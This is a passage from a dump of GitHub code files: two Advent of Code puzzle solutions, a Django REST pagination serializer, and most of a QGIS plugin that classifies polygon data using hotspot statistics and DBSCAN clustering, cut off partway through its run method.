x_max\r\n\r\n y_ = get_pos(step,vy)\r\n if is_in(x_, y_):\r\n flag = True\r\n elif x_ > target_x[1]:\r\n break\r\n elif y_ < target_y[0]:\r\n break\r\n if flag:\r\n print(\"{},{}\".format(vx, vy))\r\n counter_distinct += 1\r\n return counter_distinct\r\n\r\n","repo_name":"gherbin/aoc2021","sub_path":"aoc_2021/source/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24266991985","text":"from rest_framework import serializers\n\n\nclass PageSerializer(serializers.Serializer):\n before = serializers.SerializerMethodField()\n after = serializers.SerializerMethodField()\n\n def get_before(self, obj):\n if obj.has_previous():\n return f\"{self.context['request'].path}?page={obj.previous_page_number()}\"\n\n return None\n\n def get_after(self, obj):\n if obj.has_next():\n return f\"{self.context['request'].path}?page={obj.next_page_number()}\"\n\n return None\n\n class Meta:\n fields = ('before', 'after')\n","repo_name":"YujinHa/seouling-server","sub_path":"seouling/utils/page_serializer.py","file_name":"page_serializer.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41067785103","text":"with open(\"input.txt\") as file:\n lines = [line[:-2] for line in file.readlines()]\n\n\nbag_children_lookup = {}\n\n\nfor line in lines:\n split = line.split(\" bags contain \")\n\n bag_colour = split[0]\n bag_children_lookup[bag_colour] = []\n\n children_bags = []\\\n if split[1] == 'no other bags'\\\n else split[1][:-1].split(\", \")\n\n for child_bag in children_bags:\n bag_colour_parts = child_bag.split()\n count = int(bag_colour_parts[0])\n colour = f\"{bag_colour_parts[1]} {bag_colour_parts[2]}\"\n bag_children_lookup[bag_colour].append([count, colour])\n\n\ndef can_contain_gold_bag(colour):\n can_contain_gold = False\n\n for child_bag in bag_children_lookup[colour]:\n child_bag_colour = child_bag[1]\n if child_bag_colour == \"shiny gold\" or can_contain_gold_bag(child_bag_colour):\n can_contain_gold = True\n\n return can_contain_gold\n\n\ntotal = 0\nfor colour in bag_children_lookup.keys():\n if can_contain_gold_bag(colour):\n total += 1\n\nprint(f\"Bags that can contain a gold bag: {total}\")\n\n\ndef number_of_bags_inside(colour):\n total = 0\n\n for child_bag in bag_children_lookup[colour]:\n number_of_child_bags = child_bag[0]\n total += number_of_child_bags + (number_of_child_bags * number_of_bags_inside(child_bag[1]))\n\n return total\n\n\nprint(f\"Number of bags inside a gold bag: {number_of_bags_inside('shiny gold')}\")\n","repo_name":"Drummerboy444/Advent-of-Code","sub_path":"2020/7-handy-haversacks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72843340999","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import QIcon, QColor, QRegExpValidator\nfrom PyQt5.QtWidgets import QAction, QLineEdit, QDesktopWidget, QMessageBox, QDockWidget\nfrom qgis.core import *\n# Initialize Qt resources from file resources.py\nfrom .resources import *\n# Import the code for the dialog\nfrom .aChor_dialog import aChorDialog\nimport os.path\nimport os, sys, subprocess, shlex, shutil\nfrom subprocess import Popen, PIPE\nfrom osgeo import ogr, osr\nimport qgis.utils\nimport fiona, logging, csv, time\nfrom fiona.crs import from_epsg\nfrom pyproj import Proj, transform\nfrom shapely.geometry import shape, mapping\nimport pysal, math\nfrom pysal.esda.getisord import *\nfrom pysal.weights.Distance import DistanceBand\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\nimport dbf, webbrowser\n\nclass aChor:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n \n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'aChor_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n # Create the dialog (after translation) and keep reference\n self.dlg = aChorDialog()\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&Task-oriented data classification for polygons')\n # TODO: We are going to let the user set this up in a future iteration\n self.toolbar = self.iface.addToolBar(u'aChor')\n self.toolbar.setObjectName(u'aChor')\n self.load_comboBox()\n \n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('aChor', message)\n\n def pr(self, msg):\n QMessageBox.information(self.iface.mainWindow(),\"Debug\",msg)\n \n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToVectorMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\" \n \n icon_path = ':/plugins/aChor/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'Task-oriented data classification for polygons'),\n callback=self.run,\n parent=self.iface.mainWindow())\n self.dlg.rdb1.clicked.connect(self.setDisable)\n self.dlg.rdb2.clicked.connect(self.setDisable)\n self.dlg.rdb3.clicked.connect(self.setDisable)\n self.dlg.rdb4.clicked.connect(self.setDisable)\n self.dlg.rdb5.clicked.connect(self.setDisable)\n self.dlg.rdb6.clicked.connect(self.setDisable)\n self.dlg.rdb7.clicked.connect(self.setunChecked)\n self.dlg.rdb8.clicked.connect(self.setDisable)\n self.dlg.cb1.clicked.connect(self.setChecked)\n self.dlg.cb2.clicked.connect(self.setChecked)\n self.dlg.cb3.clicked.connect(self.setChecked)\n rx3 = QRegExp('^0$|^[1-9]\\d*$|^\\.\\d+$|^0\\.\\d*$|^[1-9]\\d*\\.\\d*$')\n validator3 = QRegExpValidator(rx3)\n self.dlg.linefdb.setValidator(validator3) \n self.dlg.rdb4.clicked.connect(self.setEnable)\n self.dlg.rdb6.clicked.connect(self.setEnable)\n self.dlg.btn_help.clicked.connect(self.open_webbrowser)\n \n def open_webbrowser(self):\n webbrowser.open('http://www.geomatik-hamburg.de/g2lab/content/aChor_README.html') \n \n def setChecked(self):\n self.dlg.rdb7.setChecked(True)\n \n def setunChecked(self):\n self.dlg.cb1.setChecked(True)\n self.dlg.rdb1.setChecked(False)\n self.dlg.rdb2.setChecked(False)\n self.dlg.rdb3.setChecked(False)\n self.dlg.rdb4.setChecked(False)\n self.dlg.rdb5.setChecked(False)\n self.dlg.rdb6.setChecked(False)\n self.dlg.rdb8.setChecked(False)\n self.dlg.cb1.setDisabled(False)\n self.dlg.cb2.setDisabled(False)\n self.dlg.cb3.setDisabled(False)\n self.set_disLabel()\n \n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginVectorMenu(\n self.tr(u'&Localextremes classification'),\n action)\n self.iface.removeToolBarIcon(action)\n # remove the toolbar\n del self.toolbar\n \n def set_disLabel(self):\n self.dlg.label_5.setDisabled(True)\n self.dlg.label_7.setDisabled(True)\n self.dlg.linefdb.setDisabled(True)\n self.dlg.label_8.setDisabled(True)\n self.dlg.lineps.setDisabled(True)\n self.dlg.label_9.setDisabled(True)\n self.dlg.cBox2.setDisabled(True)\n if self.dlg.rdb8.isChecked():\n self.dlg.label_9.setDisabled(False)\n self.dlg.cBox2.setDisabled(False)\n \n def setEnable(self): \n if self.dlg.rdb4.isChecked():\n self.dlg.label_5.setDisabled(False)\n self.dlg.label_7.setDisabled(False)\n self.dlg.linefdb.setDisabled(False)\n self.load_comboBox()\n self.dlg.linefdb.setText(str(round(thresh,4)))\n self.dlg.label_8.setDisabled(True)\n self.dlg.lineps.setDisabled(True)\n if self.dlg.rdb6.isChecked():\n self.dlg.label_8.setDisabled(False)\n self.dlg.lineps.setDisabled(False)\n self.dlg.lineps.setText('0.5')\n \n def setDisable(self):\n self.dlg.rdb7.setChecked(False)\n self.dlg.cb1.setDisabled(True)\n self.dlg.cb2.setDisabled(True)\n self.dlg.cb3.setDisabled(True) \n self.set_disLabel() \n\n def clear_fields(self):\n \"\"\"Clearing the fields when layers are changed\"\"\"\n self.dlg.comboBox.clear()\n self.dlg.cBox2.clear()\n\n def load_comboBox(self):\n \"\"\"Load the fields into combobox when layers are changed\"\"\"\n layer_shp = []\n layers = [layer for layer in QgsProject.instance().mapLayers().values()]\n \n if len(layers) != 0: # checklayers exist in the project\n for layer in layers:\n if hasattr(layer, \"dataProvider\"):\n myfilepath = layer.dataProvider().dataSourceUri() \n (myDirectory, nameFile) = os.path.split(myfilepath)\n if (\".shp\" in nameFile):\n layer_shp.append(layer)\n selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n if selectedLayerIndex < 0 or selectedLayerIndex > len(layer_shp):\n return\n try:\n selectedLayer = layer_shp[selectedLayerIndex]\n except:\n return\n\n self.clear_fields()\n \n strname = []\n catename = []\n \n #only Float or Integer field types will be shown in combobox\n for field in selectedLayer.fields():\n ftype = str(field.type()) \n if ftype == '2' or ftype == '4' or ftype == '6':\n strname.append(field.name())\n else:\n catename.append(field.name())\n \n self.dlg.comboBox.addItems(strname)\n self.dlg.cBox2.addItems(catename)\n \n (path, layer_id) = selectedLayer.dataProvider().dataSourceUri().split('|')\n\n inDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n inDataSource = inDriver.Open(path, 0)\n inLayer = inDataSource.GetLayer()\n global type\n global thresh\n type = inLayer.GetLayerDefn().GetGeomType()\n if type == 3: # is a polygon \n thresh = pysal.min_threshold_dist_from_shapefile(path)\n if float(thresh) < 1: #convert decimal degree to meters\n thresh = round(thresh * 84244.43662,0)\n else:\n thresh = round(thresh,0)\n self.suggest_sweep(str(path).strip(), self.dlg.comboBox.currentText())\n selectedFieldIndex = self.dlg.comboBox.currentIndex()\n if selectedFieldIndex < 0:\n return\n try:\n self.dlg.comboBox.activated.connect(lambda: self.suggest_sweep(str(path).strip(), str(self.dlg.comboBox.currentText()).strip()))\n #self.dlg.comboBox.currentIndexChanged.connect(lambda: self.suggest_sweep(str(path).strip(), str(self.dlg.comboBox.currentText()).strip()))\n\n except:\n return\n else:\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n self.tr(\"This is not a polygon shapefile. Please reselect from layer list\"), QMessageBox.Ok) \n \n \n \n \n def loadLayerList(self):\n layers_list = []\n layers_shp = []\n # Show the shapefiles in the ComboBox\n #layers = self.iface.legendInterface().layers()\n layers = [layer for layer in QgsProject.instance().mapLayers().values()]\n \n if len(layers) != 0: # checklayers exist in the project\n for layer in layers:\n if hasattr(layer, \"dataProvider\"): # to not consider Openlayers basemaps in the layer list\n myfilepath = layer.dataProvider().dataSourceUri() # directory including filename\n (myDirectory, nameFile) = os.path.split(myfilepath) # splitting into directory and filename\n if (\".shp\" in nameFile):\n layers_list.append(layer.name())\n layers_shp.append(layer)\n self.dlg.layerListCombo.addItems(layers_list) # adding layers to comboBox\n selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n if selectedLayerIndex < 0 or selectedLayerIndex > len(layers_shp):\n return\n selectedLayer = layers_shp[selectedLayerIndex]\n #fieldnames = [field.name() for field in selectedLayer.pendingFields()] # fetching fieldnames of layer\n fieldnames = [field.name() for field in selectedLayer.fields()]\n self.clear_fields()\n #fieldtype = [field.type() for field in selectedLayer.pendingFields()]\n fieldtype = [field.type() for field in selectedLayer.fields()]\n if (fieldtype == 'int') or (fieldtype == 'double'):\n self.dlg.comboBox.addItems(fieldnames)\n try:\n self.dlg.layerListCombo.activated.connect(lambda: self.load_comboBox())\n self.dlg.layerListCombo.currentIndexChanged.connect(lambda: self.load_comboBox())\n\n except:\n return False\n return [layers, layers_shp]\n else:\n return [layers, False]\n \n def suggest_sweep(self, inp, attr):\n \n global suggestion\n global achor_max_val\n global achor_min_val\n \n with fiona.open(inp) as source:\n features = list(source)\n \n try:\n i = 0\n for val in features:\n if not(val['properties'][attr] is None):\n #achor_max_val = max(val['properties'][attr] for val in features)\n value = val['properties'][attr] \n if i == 0:\n achor_max_val = value\n achor_min_val = value\n if value > achor_max_val:\n achor_max_val = value\n if value < achor_min_val:\n achor_min_val = value\n i+=1\n\n except KeyError:\n return\n \n if (achor_max_val or achor_min_val):\n valrange = achor_max_val-achor_min_val\n \n if 0 < valrange < 1:\n suggestion = valrange/100\n elif 1 <= valrange < 30:\n suggestion = round(valrange/(valrange*3.33),4)\n elif 30 <= valrange < 100:\n suggestion = round(valrange/(valrange*2),4)\n elif 100 <= valrange < 999:\n suggestion = round(valrange/(valrange*0.37),4)\n elif 1000 < valrange < 4999:\n suggestion = int(valrange/(valrange/2))\n elif 5000 < valrange < 9999:\n suggestion = int(valrange / 1000)\n elif valrange >= 10000:\n suggestion = int(valrange / 2000)\n \n source.close()\n \n if suggestion:\n self.dlg.lineEdit2.setText(str(suggestion))\n \n def create_colorrange(self, i_step, i_start, i_stop, mid=None):\n \n \"\"\"Takes a number of steps to create a color range for given hex color values\"\"\"\n def get_range(step, start, stop):\n try:\n initial_start = start\n initial_stop = stop\n \n start = start.lstrip('#')\n stop = stop.lstrip('#')\n \n start_rgb = []\n stop_rgb = []\n \n start_rgb.extend([int(start[i:i+2], 16) for i in (0, 2, 4)])\n stop_rgb.extend([int(stop[i:i+2], 16) for i in (0, 2, 4)])\n \n color_gradient = [initial_start]\n \n step_rgb = []\n operator = []\n\n for start, stop in zip(start_rgb, stop_rgb):\n step_rgb.append(int(abs(start-stop)/(step-1)))\n if start > stop:\n operator.append('-')\n else:\n operator.append('+')\n\n for i in range(int(step)-2):\n for i in range(3):\n if operator[i] == \"+\":\n start_rgb[i] += step_rgb[i]\n elif operator[i] == \"-\":\n start_rgb[i] -= step_rgb[i]\n \n result = '#' + ''.join('0' + str(hex(abs(rgb_val))).lstrip('0x')\n if abs(rgb_val) in ([x for x in range(1,16)])\n else '00' if abs(rgb_val) == 0 \n else str(hex(abs(rgb_val))).lstrip('0x')\n for rgb_val in start_rgb)\n \n color_gradient.append(result) \n color_gradient.append(initial_stop)\n \n return color_gradient\n except ZeroDivisionError:\n print(\"step is {}, has to be minimum 2!\".format(step))\n \n if mid:\n case_even = 0\n if i_step % 2 == 0:\n case_even = 1\n i_step = math.ceil(float(i_step) / 2)\n result = [x for x in get_range(i_step, i_start, mid)]\n result.extend([x for x in get_range(i_step+case_even, mid, i_stop)[1:]])\n \n return result\n return get_range(i_step, i_start, i_stop)\n \n def write_file(self, outfilename, statistics, layerName, inLayer, inDataSource, y, threshold):\n \"\"\"Writing the output shapefile into the mentioned directory\"\"\"\n outDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n layerName = layerName.split('.')\n layerName.pop()\n # layerName = '.'.join(layerName)\n\n outShapefile = outfilename + \".shp\"\n\n # Remove eventually alrady exisiting output\n if os.path.exists(outShapefile):\n outDriver.DeleteDataSource(outShapefile) \n # Create the output shapefile\n outDataSource = outDriver.CreateDataSource(outShapefile)\n outLayer = outDataSource.CreateLayer(\"output\", inLayer.GetSpatialRef(), inLayer.GetLayerDefn().GetGeomType())\n\n # Add input Layer Fields to the output Layer\n inLayerDefn = inLayer.GetLayerDefn()\n \n for i in range(0, inLayerDefn.GetFieldCount()):\n fieldDefn = inLayerDefn.GetFieldDefn(i)\n outLayer.CreateField(fieldDefn)\n\n # Add empty field to store Pysal results\n Z_field = ogr.FieldDefn(\"Z-score\", ogr.OFTReal)\n Z_field.SetWidth(15)\n Z_field.SetPrecision(10)\n outLayer.CreateField(Z_field)\n\n p_field = ogr.FieldDefn(\"p-value\", ogr.OFTReal)\n p_field.SetWidth(15)\n p_field.SetPrecision(10)\n outLayer.CreateField(p_field)\n\n # Create a Field to show hot or coldspot\n Gi_bin = ogr.FieldDefn(\"Gi_Bin\", ogr.OFTString)\n Gi_bin.SetWidth(10)\n Gi_bin.SetPrecision(10)\n outLayer.CreateField(Gi_bin)\n \n # Get the output Layer's Feature Definition\n outLayerDefn = outLayer.GetLayerDefn()\n\n # Get the input Layer's Feature Definition\n inLayerDefn = inLayer.GetLayerDefn()\n\n # Add features to the ouput Layer\n for i in range(0, inLayer.GetFeatureCount()):\n # Get the input Feature\n inFeature = inLayer.GetFeature(i)\n # Create output Feature\n outFeature = ogr.Feature(outLayerDefn)\n # Add field values from input Layer\n for j in range(0, inLayerDefn.GetFieldCount()):\n print(inFeature.GetField(j))\n print(outLayerDefn.GetFieldDefn(j).GetNameRef())\n outFeature.SetField(outLayerDefn.GetFieldDefn(j).GetNameRef(), inFeature.GetField(j))\n # Set geometry\n geom = inFeature.GetGeometryRef()\n outFeature.SetGeometry(geom)\n\n if self.dlg.rdb4.isChecked() == 1:\n # Add Z-scores and p-values to their field column\n # to use normality hypothesis\n # first version: max(y)\n if np.mean(y) >= 0:\n outFeature.SetField(\"Z-score\", statistics.Zs[i])\n outFeature.SetField(\"p-value\", statistics.p_norm[i] * 2)\n Z_score = float(statistics.Zs[i])\n p_value = float(statistics.p_norm[i] * 2)\n else:\n outFeature.SetField(\"Z-score\", statistics.Zs[i] * (-1))\n outFeature.SetField(\"p-value\", statistics.p_norm[i] * 2) \n Z_score = float(statistics.Zs[i] * (-1))\n p_value = float(statistics.p_norm[i] * 2)\n # Set Gi_Bin Field\n if Z_score <= -2.58 and p_value <= 0.01:\n outFeature.SetField(\"Gi_Bin\", \"-3\")\n elif Z_score >= 2.58 and p_value <= 0.01:\n outFeature.SetField(\"Gi_Bin\", \"3\")\n elif Z_score <= -1.96 and Z_score > -2.58 and p_value <= 0.05 and p_value > 0.01:\n outFeature.SetField(\"Gi_Bin\", \"-2\")\n elif Z_score >= 1.96 and Z_score < 2.58 and p_value <= 0.05 and p_value > 0.01:\n outFeature.SetField(\"Gi_Bin\", \"2\")\n elif Z_score <= -1.65 and Z_score > -1.96 and p_value <= 0.1 and p_value > 0.05:\n outFeature.SetField(\"Gi_Bin\", \"-1\")\n elif Z_score >= 1.65 and Z_score < 1.96 and p_value <= 0.1 and p_value > 0.05:\n outFeature.SetField(\"Gi_Bin\", \"1\")\n else:\n outFeature.SetField(\"Gi_Bin\", \"0\")\n \n # Add new feature to output Layer\n outLayer.CreateFeature(outFeature)\n\n # Close DataSources\n inDataSource.Destroy()\n outDataSource.Destroy()\n\n\n def getCentroid(self,shp,outpoint):\n #for hotspot and cluster method, when wgs84, reproject into EPSG3857 \n with fiona.open(shp) as src:\n #meta = src.meta\n schema = src.schema\n schema['geometry'] = 'Point'\n schema['properties'].update({'cX': 'float:15.13','cY': 'float:15.13','dbscan': 'int'})\n check = False\n dest_crs = src.crs\n for key in dest_crs.keys(): \n try:\n if dest_crs[key] == 'epsg:4326':\n check = True \n except ValueError:\n pass\n if check == True: \n dest_crs = from_epsg(3857)\n logging.info(\"crs:WGS84, reproject to 3857\")\n \n original = Proj(src.crs) \n destination = Proj('+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs')\n #with fiona.open(outpoint, 'w', crs=epsg,**meta) as dst:\n with fiona.open(outpoint,'w',schema=schema,crs=dest_crs,driver=src.driver) as dst:\n for f in src:\n centroid = shape(f['geometry']).centroid \n f['geometry'] = mapping(centroid)\n long = f['geometry']['coordinates'][0]\n lat = f['geometry']['coordinates'][1]\n if check == True: \n x,y = transform(original,destination,long,lat)\n f['geometry']['coordinates'] = (x,y)\n f['properties']['cX'] = round(float(x),13)\n f['properties']['cY'] = round(float(y),13)\n else: \n f['properties']['cX'] = round(float(long),13)\n f['properties']['cY'] = round(float(lat),13)\n f['properties']['dbscan'] = 0 \n dst.write(f)\n dst.close()\n src.close()\n \n \n def make_var_density_blobs(self,n_samples=100, centers=[[0,0]], cluster_std=[0.5], random_state=0):\n samples_per_blob = n_samples // len(centers)\n blobs = [make_blobs(n_samples=samples_per_blob, centers=[c], cluster_std=cluster_std[i])[0]\n for i, c in enumerate(centers)]\n labels = [i * np.ones(samples_per_blob) for i in range(len(centers))]\n return np.vstack(blobs), np.hstack(labels)\n\n def dbf_to_csv(self,dbf_table_pth):#Input a dbf, output a csv, same name, same path, except extension\n csv_fn = dbf_table_pth[:-4]+ \".csv\" #Set the csv file name\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Info\"),\n self.tr(str(csv_fn)), QMessageBox.Ok)\n table = DBF(dbf_table_pth)# table variable is a DBF object\n with open(csv_fn, 'w', newline = '') as f:# create a csv file, fill it with dbf content\n writer = csv.writer(f)\n writer.writerow(table.field_names)# write the column name\n for record in table:# write the rows\n writer.writerow(list(record.values()))\n return csv_fn# return the csv name\n\n def run(self):\n \"\"\"Run method that performs all the real work\"\"\"\n\n self.dlg.layerListCombo.clear()\n self.clear_fields()\n \n layers, layers_shp = self.loadLayerList()\n if len(layers) == 0:\n return \n\n #set regular expression\n rx = QRegExp('^[1-9]\\d{1}$')\n validator = QRegExpValidator(rx)\n self.dlg.lineEdit.setValidator(validator)\n rx2 = QRegExp('^0$|^[1-9]\\d*$|^\\.\\d+$|^0\\.\\d*$|^[1-9]\\d*\\.\\d*$')\n validator2 = QRegExpValidator(rx2)\n self.dlg.lineEdit2.setValidator(validator2)\n rx3 = QRegExp('^(0(\\.\\d+)?|1\\.0)\\d{0,3}$')\n validator3 = QRegExpValidator(rx3)\n self.dlg.lineps.setValidator(validator3)\n # show the dialog\n self.dlg.show()\n self.load_comboBox()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n logging.basicConfig(filename=self.plugin_dir+'/debug.log',filemode='w',level=logging.INFO)\n\n selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n if selectedLayerIndex < 0 or selectedLayerIndex > len(layers):\n return\n selectedLayer = layers_shp[selectedLayerIndex]\n layerName = selectedLayer.dataProvider().dataSourceUri()\n (path, layer_id) = layerName.split('|')\n inDriver = ogr.GetDriverByName(\"ESRI Shapefile\")\n inDataSource = inDriver.Open(path, 0)\n inLayer = inDataSource.GetLayer()\n C = selectedLayer.fields().indexFromName(self.dlg.comboBox.currentText())\n type = inLayer.GetLayerDefn().GetGeomType()\n \n if type == 3: # polygon\n #pass\n classnum = self.dlg.lineEdit.text()\n interval = self.dlg.lineEdit2.text()\n field = self.dlg.comboBox.currentText()\n calfd = self.dlg.cBox2.currentText()\n shp = str(path)\n if self.dlg.rdb1.isChecked():\n method = 1\n display = 'localextreme'\n elif self.dlg.rdb2.isChecked():\n method = 2\n display = 'localmax'\n elif self.dlg.rdb3.isChecked():\n method = 3\n display = 'localmin'\n elif self.dlg.rdb4.isChecked():\n method = 4\n display = 'hotcoldspot'\n elif self.dlg.rdb5.isChecked():\n method = 5\n display = 'neighbor'\n elif self.dlg.rdb6.isChecked():\n method = 6\n display = 'cluster'\n elif self.dlg.cb1.isChecked():\n method = 71\n display = 'globalextreme-Quantile'\n elif self.dlg.cb2.isChecked():\n method = 72\n display = 'globalextreme-Equal'\n elif self.dlg.cb3.isChecked():\n method = 73\n display = 'globalextreme-Neighbor'\n elif self.dlg.rdb8.isChecked():\n method = 8\n display = 'nested'\n else:\n method = 1\n display = 'localextreme'\n \n myVectorLayer = QgsVectorLayer(path, display, 'ogr')\n\n #QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n #self.tr(self.plugin_dir+'\\n'+classnum+'\\n'+interval+'\\n'+field+'\\n'+shp+'\\n'+display), QMessageBox.Ok)\n logging.info('class number:'+classnum+'\\ninterval:'+str(interval)+'\\nfield:'+field+'\\nshapefile:'+shp+'\\nmethods:'+display)\n\n #check if sweep interval is reasonable\n if ((achor_max_val-achor_min_val)/float(interval)) < 15:\n interval = suggestion\n \n #qgis.utils.iface.actionShowPythonDialog().trigger()\n strdir=self.plugin_dir\n if os.name == \"nt\":\n py_executable = 'python'\n if str(sys.version)[:1] == '3':\n py_executable += '3'\n strdir=strdir.replace(\".\",\"\").replace(\"\\\\\",\"/\").replace(\"//\",\"/\")\n elif os.name == \"posix\":\n py_executable = 'python'\n \n if method == 4 or method == 6: \n #convert polygon to point \n outpoint = strdir+\"/test/inputpoint\"\n self.getCentroid(shp,outpoint) \n \n u = []\n inDataSource1 = inDriver.Open(outpoint, 0)\n inLayer1 = inDataSource1.GetLayer()\n\n for i in range(0, inLayer1.GetFeatureCount()):\n geometry = inLayer1.GetFeature(i)\n u.append(geometry.GetField(C)) \n y = np.array(u) # attributes vector\n t = ()\n for feature in inLayer1:\n geometry = feature.GetGeometryRef()\n xy = (geometry.GetX(), geometry.GetY())\n t = t + (xy,) \n if method == 4: \n number = round(float(self.dlg.linefdb.text()),0) \n #thresh = pysal.min_threshold_dist_from_shapefile(path)\n #if float(thresh) < 1: #WGS84\n #threshold = round(thresh,6)\n #w = DistanceBand(t, int(threshold), p=2, binary=False)\n #logging.info(\"Hotspot: Fixed Distance Band: \"+threshold+\", WGS84\")\n #else:\n threshold = number\n w = DistanceBand(t, int(number), p=2, binary=False)\n logging.info(\"Hotspot: Fixed Distance Band: \"+self.dlg.linefdb.text())\n #Run Getis-Ord statistics\n outfilename = strdir+\"/test/hotspotshp\"\n type_w = \"B\"\n permutationsValue = 9999 \n np.random.seed(12345) \n\n statistics = G_Local(y, w, star=True, transform=type_w, permutations=permutationsValue)\n self.write_file(outfilename, statistics, layerName, inLayer1, \n inDataSource1, \n y, threshold) \n #shp=outfilename+\".shp\" \n #inDataSource1.Destroy()\n \n if method == 6:\n # Generate samples\n centers = [[0, -1], [12, 5], [30, 101]]\n densities = [0.2, 0.9, 0.5]\n #convert polygon to point \n items=[\"cx\",\"cy\",field]\n # convert attribute csv\n dbfname=dbf.Table(outpoint+r\"/inputpoint.dbf\",codepage='utf8')\n dbfname.open() \n csvname=strdir+\"/test/inputpoint/inputpoint.csv\" \n \n with open(csvname, 'w', newline = '') as f: \n writer = csv.writer(f)\n writer.writerow(items)\n for record in dbfname:\n #print(record['GebietName'])\n attribute_list = []\n attribute_list.append(record['cx'])\n attribute_list.append(record['cy'])\n attribute_list.append(record[field.lower()])\n try: \n writer.writerow(attribute_list) \n except ValueError: \n pass\n dbfname.close()\n f.close()\n inDataSource1.Destroy()\n # Compute DBSCAN \n data = np.loadtxt(open(csvname, \"rb\"), delimiter=\",\", skiprows=1)\n nrows = data.shape[0]\n \n X, labels_true = self.make_var_density_blobs(n_samples=nrows, centers=centers, cluster_std=densities,\n random_state=0)\n X = StandardScaler().fit_transform(data)\n\n outdbf = dbf.Table(outpoint+r\"/inputpoint.dbf\",codepage='utf8') \n outdbf.open(mode=dbf.READ_WRITE) \n db_t1 = time.time()\n db = DBSCAN(eps=float(self.dlg.lineps.text())).fit(X)\n db_labels = db.labels_\n db_elapsed_time = time.time() - db_t1\n n_clusters_db_ = len(set(db_labels)) - (1 if -1 in db_labels else 0)\n j=0\n for record in outdbf:\n with record as r:\n r.dbscan=db_labels[j]\n j +=1\n if n_clusters_db_ <= 1:\n print('Silhouette Coefficient: NaN (too few clusters)')\n QMessageBox.warning(self.dlg.show(), self.tr(\"aChor:Warning\"),\n self.tr(\"too few clusters: \"+db_labels+\"/n Please change eps to get better result\"), QMessageBox.Ok)\n outdbf.close()\n if not hasattr(sys, 'argv'):\n sys.argv = ['']\n sys.argv.append(classnum)\n sys.argv.append(interval)\n sys.argv.append(field)\n sys.argv.append(shp)\n sys.argv.append(method)\n \n cmd=py_executable+\" \"+strdir+\"/class_achor.py \"+classnum+\" \"+str(interval)+\" \"+field+\" \"+shp.strip().replace('\\\\',r'/')\n \n sys.argv.append(calfd)\n cmd+= \" \" + calfd\n \n cmd += \" -m \"+ str(method)\n \n logging.info(\"Starting main script\")\n QMessageBox.warning(self.dlg.show(), 